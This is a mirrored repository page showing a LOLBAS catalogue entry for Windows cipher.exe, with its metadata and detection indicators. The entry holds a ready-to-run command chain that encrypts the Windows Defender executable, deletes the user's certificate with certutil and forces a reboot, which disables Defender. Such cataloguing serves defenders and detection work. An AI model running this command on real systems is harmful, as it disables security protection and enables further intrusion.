public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2024-12-27 23:37:58 +01:00
Code Issues Projects Releases Wiki Activity
a6425e5c4e
LOLBAS/yml/OSBinaries/Cipher.yml
Alexander Sennhauser 87ee870023 document cipher.exe usage to disable services
2023-01-09 11:00:40 +01:00

26 lines
850 B
YAML
Raw Blame History

---
Name: Cipher.exe
Description: Security Tool for the Windows Encrypting File System
Author: Alexander Sennhauser
Created: 2023-01-09
Commands:
- Command: cipher.exe /e "C:\ProgramData\Microsoft\Windows Defender\Platform\*\MsMpEng.exe" & certutil.exe -delstore -user my %username% & shutdown.exe /r /t 0
Description: Encrypt the Windows Defender binary to disable the service after a system restart.
Usecase: MSFT Defender bypass using LOLBINs
Category: Tamper
Privileges: Admin
MitreID: T1562
OperatingSystem: Windows 10 All
Full_Path:
- Path: c:\windows\system32\cipher.exe
Code_Sample:
- Code:
Detection:
- IOC: cipher.exe spawned with unusual path arguments
- IOC: certutil.exe spawned to delete user certificates
Resources:
- Link:
Acknowledgement:
- Person: Alexander Sennhauser
Handle: '@conitrade'
Reference in New Issue View Git Blame Copy Permalink